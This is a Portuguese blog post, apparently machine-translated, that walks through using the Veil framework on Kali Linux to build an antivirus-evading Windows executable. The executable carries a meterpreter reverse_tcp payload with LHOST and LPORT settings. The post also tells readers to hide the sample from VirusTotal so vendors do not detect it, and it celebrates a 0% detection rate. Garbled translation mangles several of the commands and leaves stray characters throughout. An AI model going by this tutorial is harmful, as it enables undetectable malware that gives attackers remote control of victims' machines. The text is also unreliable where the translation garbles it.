ANDROID

[ANDROID][bsummary]

FACEBOOK

[FACEBOOK][twocolumns]

NOTÍCIAS

[NOTÍCIAS][bleft]

KALI LINUX

[KALI LINUX][grids]

Ignorando Antivírus usando Veil no Kali Linux


Veil é uma ótima ferramenta desenvolvida por Chris Truncer @ChrisTruncer, Mike Wright @ TheMightyShiv e The Grayhound @the_grayhound especificamente projetado para o Kali Linux

Eu quero falar sobre Veil e dar alguns exemplos sobre como ignorar vários anti-vírus.
As principais mudanças nas versões mais recentes são:
  • Compatibilidade x64 - Atualizaram o script de configuração para tornar o Veil compatível com as versões x86 e x64.
  • Atualização - Now Veil possui uma função de atualização. Agora, podemos atualizar o Veil na linha de comando ou no menu.
Se você quiser instalar o Veil em qualquer ambiente que você preferir, você pode usar os seguintes comandos:
Wget https://github.com/ChrisTruncer/Veil/archive/master.zip
Descompacte master.zip
Cd Veil-master / setup
Cd ..
./setup.sh
Se você quer trabalhar com o Kali Linux , com os comandos abaixo será suficiente.
Atualização apt-get
Véu de instalação apropriado 
Eu tive uma experiência ruim com a segunda opção e prefiro instalar o Veil com o primeiro usando o script "setup.sh".
Os desenvolvedores do Veil não querem enviar qualquer carga útil para www.virustotal.com para evitar a distribuição aos fornecedores de antivírus . Existe uma alternativa: vscan.novirusthanks.org . Esse site verifica os arquivos suspeitos para a detecção de malware e nos oferece a opção: "Não distribua a amostra".
Quando o Veil foi instalado, basta executá-lo com o comando abaixo:

./Véu
Por padrão no Kali Linux, podemos ver 18 cargas úteis prontas para serem usadas. Agora podemos digitar "usar".
87
Aqui, o Veil nos oferece mais informações sobre as cargas úteis. Nesse caso, escolho python / b64VirtualAlloc digitando 18 "
12
Quando nossa carga útil é carregada, digitegerar "Você pode definir algumas opções específicas, mas nesta publicação, vamos tentar as opções padrão.
11
Agora vamos selecionar msfvenom digitando 1 "

uma
Depois disso, precisamos digitar alguns detalhes:
  • Digite a carga útil de metasploit:windows / meterpreter / reverse_tcp "
  • Digite o valor para 'LHOST', [ guia ] para IP local: "192.168.69.69"
  • Digite o valor para 'LPORT': " 443 "
Então, é necessário esperar enquanto o shellcode foi gerado.
V
Você precisa pressionar enter e, em seguida, Veil solicita o nome da nossa carga útil. Nesse caso, " indetectável " (ou o que quiser)
F
Nós vamos usar Pyinstaller. Ele criará um .exe instalável. Para isso, vamos digitar 1 "
4
No final, podemos obter o nosso executável em/ root / Veil-master / output / compiled / "
Fd
Agora, temos o nosso executável e vamos enviá-lo para vscan.novirusthanks.org . Por favor, lembre- se de verificar " Não distribuir a amostra ". Se você optar por não verificar essas opções ou decidir enviar o executável para www.virustotal.com, seu arquivo será investigado e talvez seja reconhecido por alguns fornecedores de antivírus.
Fa


Você pode ver na imagem abaixo qualquer um dos fornecedores de antivírus que detectaram nosso arquivo como malicioso. Temos uma taxa de detecção de 0% !!!!
0 comentários via Blogger
comentários via Facebook

Nenhum comentário :